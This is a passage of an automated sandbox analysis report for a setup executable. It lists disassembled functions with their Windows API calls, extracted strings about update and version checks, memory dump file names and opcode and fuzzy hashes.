                                                                                                                          • Opcode Fuzzy Hash: 3e28b43493185bac65bc55f23d7b080b25285df12a6dac78added3e5532ff0df
                                                                                                                          • Instruction Fuzzy Hash: 3FE09A35644340ABE3162B64FC6CF1E7AB4BBE1B02F06810EF603862E0CAB48080CB10
                                                                                                                          Function 00C8606D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00C860FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                          • String ID: pow
                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                          • Opcode ID: e732248ced5c383f9bc548e0ebd4df41ce731d24b738d418a1fa58d6b0ea828b
                                                                                                                          • Instruction ID: e5e110d7c8d16bb16095b88dfe903f9cebcb65500c43c2a68311c6274703a42b
                                                                                                                          • Opcode Fuzzy Hash: e732248ced5c383f9bc548e0ebd4df41ce731d24b738d418a1fa58d6b0ea828b
                                                                                                                          • Instruction Fuzzy Hash: E1515D61A0410296DB11BB14CD5536F2BA0EB4171CF208D7DE0E6872EBEF358E969B4E
                                                                                                                          Function 00C1D359 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1D363
                                                                                                                            • Part of subcall function 00C244B5: __EH_prolog3.LIBCMT ref: 00C244BC
                                                                                                                            • Part of subcall function 00C244B5: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000104,00000004,00C1D386,?,000000CC,00C1C82F), ref: 00C244E1
                                                                                                                            • Part of subcall function 00C1C288: UpdateWindow.USER32(?), ref: 00C1C2FA
                                                                                                                          Strings
                                                                                                                          • Unable to check if update program needs updating., xrefs: 00C1D420
                                                                                                                          • Failed to get version information., xrefs: 00C1D38A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileH_prolog3H_prolog3_ModuleNameUpdateWindow
                                                                                                                          • String ID: Failed to get version information.$Unable to check if update program needs updating.
                                                                                                                          • API String ID: 1447007336-1761294516
                                                                                                                          • Opcode ID: 6376c3dd7aed7eb54c00015c389aed4bd00d0ab942a5b0cee40ed98245190889
                                                                                                                          • Instruction ID: cf27e9680ab467fb318dc87d872832abe8a7b1cad35373da68f4e2519de612fd
                                                                                                                          • Opcode Fuzzy Hash: 6376c3dd7aed7eb54c00015c389aed4bd00d0ab942a5b0cee40ed98245190889
                                                                                                                          • Instruction Fuzzy Hash: 67518F71D10268EEEB54DBE9CC419EEB7B9AF18300F40026AF905F3191EB306E45DB61
                                                                                                                          Function 00C4134F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$LockUnlock
                                                                                                                          • String ID: System
                                                                                                                          • API String ID: 2502338518-3470857405
                                                                                                                          • Opcode ID: 9caaa33de7de714a22f0186fcf36e93bfc18e92617ebbc9069f2ec63f6487c4c
                                                                                                                          • Instruction ID: ad43e323c3839435f15779df9c5e5f34545b69e4b3c618e42b75238bbe2aab0c
                                                                                                                          • Opcode Fuzzy Hash: 9caaa33de7de714a22f0186fcf36e93bfc18e92617ebbc9069f2ec63f6487c4c
                                                                                                                          • Instruction Fuzzy Hash: 4841A275A0061AAFDB24DF64C840ABEB7F1FF84350F288129E865A7690E7709F81DB50
                                                                                                                          Function 00C424A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C424A9
                                                                                                                          • CoCreateGuid.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 00C42504
                                                                                                                          Strings
                                                                                                                          • %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X, xrefs: 00C4254E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateGuidH_prolog3_
                                                                                                                          • String ID: %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X
                                                                                                                          • API String ID: 2971167768-1017209998
                                                                                                                          • Opcode ID: 12018c96787ba0b3aed7e7f63e129f8aa479df19fa5da67adeecd87d2ba87769
                                                                                                                          • Instruction ID: 5db32a48c97a7757034738eb2fbe2137179b3c63c404f604037436d5e27202e0
                                                                                                                          • Opcode Fuzzy Hash: 12018c96787ba0b3aed7e7f63e129f8aa479df19fa5da67adeecd87d2ba87769
                                                                                                                          • Instruction Fuzzy Hash: F9418E72A00159AFCF15EBA4C855AFEBBB9AF09310F144059F541B7282CB789E09EB70
                                                                                                                          Function 00C70422 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EncodePointer.KERNEL32(00000000,?), ref: 00C70447
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EncodePointer
                                                                                                                          • String ID: MOC$RCC
                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                          • Opcode ID: 17d4ab5a66c6528e359589eb060b3ebe12df3b7e57a5b26dc32ed88a00055603
                                                                                                                          • Instruction ID: 6695798abe3138952e1bd2b85aea4caeb5ae611f76cd850a2a13c2244ea0d3ff
                                                                                                                          • Opcode Fuzzy Hash: 17d4ab5a66c6528e359589eb060b3ebe12df3b7e57a5b26dc32ed88a00055603
                                                                                                                          • Instruction Fuzzy Hash: 0B415872900209EFCF25DF98DC81AEEBBB5BF08304F248199FA1967251D335AA51DF51
                                                                                                                          Function 00C623A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: vswprintf
                                                                                                                          • String ID: element table allocation failed$malloc failed
                                                                                                                          • API String ID: 225791605-74719141
                                                                                                                          • Opcode ID: b714717ab85b85b4218495018e19840f9386f1d777ec0e67ba37e66182dc0b90
                                                                                                                          • Instruction ID: e77519b368be5a63ec8fe577d1afbedb623da027c45592b1f85a5ddbd3824a0e
                                                                                                                          • Opcode Fuzzy Hash: b714717ab85b85b4218495018e19840f9386f1d777ec0e67ba37e66182dc0b90
                                                                                                                          • Instruction Fuzzy Hash: D831F075A00A14ABDB319F649C85B6F73ACEF04315F000279FC09A2251EBB1EF4497A1
                                                                                                                          Function 00C21C56 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID: .lnk$.pif
                                                                                                                          • API String ID: 431132790-2725715280
                                                                                                                          • Opcode ID: 522ba4f7fe997f7fa9e752b97ed5e7d2d2ce0fee65f1ab03aa3de4b018083fb2
                                                                                                                          • Instruction ID: ce2d8ef3e1799537c002b9f3f57810f8c2b388dba07a8c142b7448c2183090be
                                                                                                                          • Opcode Fuzzy Hash: 522ba4f7fe997f7fa9e752b97ed5e7d2d2ce0fee65f1ab03aa3de4b018083fb2
                                                                                                                          • Instruction Fuzzy Hash: 3631E331640255AFDF05EBA0D856BEE3764AF20310F14C129FD156B2C2DF749B48E720
                                                                                                                          Function 00C3B003 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C3AF66: RegCloseKey.ADVAPI32(00000000,?,?,?,?,00C3AD94,?,00000000), ref: 00C3AFAB
                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000003,?,?,?,00000000), ref: 00C3B035
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3B03E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$Value
                                                                                                                          • String ID: A
                                                                                                                          • API String ID: 299128501-3554254475
                                                                                                                          • Opcode ID: ccd73cbcdd8e43fca15138637cd20ad3225263b03622ccf9e2b9c8824662e624
                                                                                                                          • Instruction ID: dda27661e2917c6e86c2817e58ebeafb539e16329d55ca3aeef44fcbd9569160
                                                                                                                          • Opcode Fuzzy Hash: ccd73cbcdd8e43fca15138637cd20ad3225263b03622ccf9e2b9c8824662e624
                                                                                                                          • Instruction Fuzzy Hash: 5A212876510124ABCB159F94DC45AAFBFB5EF48760F10405AF914DB291EB32CD42D760
                                                                                                                          Function 00C207F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID: .lnk$.pif
                                                                                                                          • API String ID: 431132790-2725715280
                                                                                                                          • Opcode ID: 9b1b9555109df6b7e98f5a681c938d5aefd67288cba3e89d5c4d2d32d08e00c3
                                                                                                                          • Instruction ID: ec8fac6fd71b86cef7214b9ecb30dc937e82f36966845b0ad37aa6cb21409f7e
                                                                                                                          • Opcode Fuzzy Hash: 9b1b9555109df6b7e98f5a681c938d5aefd67288cba3e89d5c4d2d32d08e00c3
                                                                                                                          • Instruction Fuzzy Hash: 0021D73250415AAEDF04FBE0D856BEE7B64AF14310F10841AF954A75C2DF349708D761
                                                                                                                          Function 00C26BA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strncpy
                                                                                                                          • String ID: text
                                                                                                                          • API String ID: 2961919466-999008199
                                                                                                                          • Opcode ID: 397f50370021d8e68e263c25229025a87ad94253a69efa8f54c10972a09703a3
                                                                                                                          • Instruction ID: 3895bee19cd423bd8dc2e62b92946a76b96c31544131e0329510ef03f54df2e1
                                                                                                                          • Opcode Fuzzy Hash: 397f50370021d8e68e263c25229025a87ad94253a69efa8f54c10972a09703a3
                                                                                                                          • Instruction Fuzzy Hash: E31100709002259FCB31EB68DD41F9AB3F8EB14319F0080A9E549A7152D770EE88EF60
                                                                                                                          Function 00C18837 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4218353326-3688684798
                                                                                                                          • Opcode ID: ac0dbb615841b9af5502e3ec30d9382c7d34c425101ed30b3f8b6b89350a0117
                                                                                                                          • Instruction ID: c5d2a819e844cf29acf945161c91895adc24e6d2a3604ae272d7593e79207699
                                                                                                                          • Opcode Fuzzy Hash: ac0dbb615841b9af5502e3ec30d9382c7d34c425101ed30b3f8b6b89350a0117
                                                                                                                          • Instruction Fuzzy Hash: F301C070B146009BE538DA389C5587B7399EB857107100B1DF4A6873C1DE31DD8DB7E1
                                                                                                                          Function 00C0181E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_
                                                                                                                          • String ID: GET$POST
                                                                                                                          • API String ID: 2427045233-3192705859
                                                                                                                          • Opcode ID: 7a1b4a7175e69128c89a299b0fb0d0eb9ff5a36332b618c9ecdabf17fc4b55c2
                                                                                                                          • Instruction ID: c632623b7df439e282119381baa83ae26da7734bbbd4fa51852bae377ace4aa5
                                                                                                                          • Opcode Fuzzy Hash: 7a1b4a7175e69128c89a299b0fb0d0eb9ff5a36332b618c9ecdabf17fc4b55c2
                                                                                                                          • Instruction Fuzzy Hash: 38115E70901254EBDF14EF90C4955FDB7B4BF15314F59825AEC112B1C1CB306B49EB50
                                                                                                                          Function 00C151E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00C15222
                                                                                                                          • wsprintfW.USER32 ref: 00C1525F
                                                                                                                            • Part of subcall function 00C270EE: __EH_prolog3_GS.LIBCMT ref: 00C270F5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_Versionwsprintf
                                                                                                                          • String ID: %u.%u.%u
                                                                                                                          • API String ID: 2083962527-4174243573
                                                                                                                          • Opcode ID: 79bf1f5826c90c6a7472283c02d2cf4161c961b661e8a51fb2a85f55b0c7b2aa
                                                                                                                          • Instruction ID: 17ce2a92a336510d5173f8d1103b9d478a56ddbc3f50dd446780d223505ea872
                                                                                                                          • Opcode Fuzzy Hash: 79bf1f5826c90c6a7472283c02d2cf4161c961b661e8a51fb2a85f55b0c7b2aa
                                                                                                                          • Instruction Fuzzy Hash: CD018875A0021CABDF30DBA5DC89FEE73BCAF55300F0001A9A505D2191E7709A44DB50
                                                                                                                          Function 00C16D06 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen_strncpy
                                                                                                                          • String ID: VERSION
                                                                                                                          • API String ID: 100186321-2153328089
                                                                                                                          • Opcode ID: b7ff2a53b628c005efb35fefa24df66a66f9b6385274582386b418fc210dbebb
                                                                                                                          • Instruction ID: 61ef23a982f24b8e33daf9471efbb67b0560c31f4def6bb23758ae07107bfb9e
                                                                                                                          • Opcode Fuzzy Hash: b7ff2a53b628c005efb35fefa24df66a66f9b6385274582386b418fc210dbebb
                                                                                                                          • Instruction Fuzzy Hash: F0F0F632B00A1239E7317974BC42FEB378C8B16750F144429FD58D4442E760DB92B3A4
                                                                                                                          Function 00C0FED2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetClassInfoW.USER32(?,MultiDataViewCtrl,?), ref: 00C0FEED
                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00C0FF20
                                                                                                                            • Part of subcall function 00C2F210: __EH_prolog3_catch.LIBCMT ref: 00C2F217
                                                                                                                            • Part of subcall function 00C2F210: GetClassInfoW.USER32(?,?,0000000B), ref: 00C2F229
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
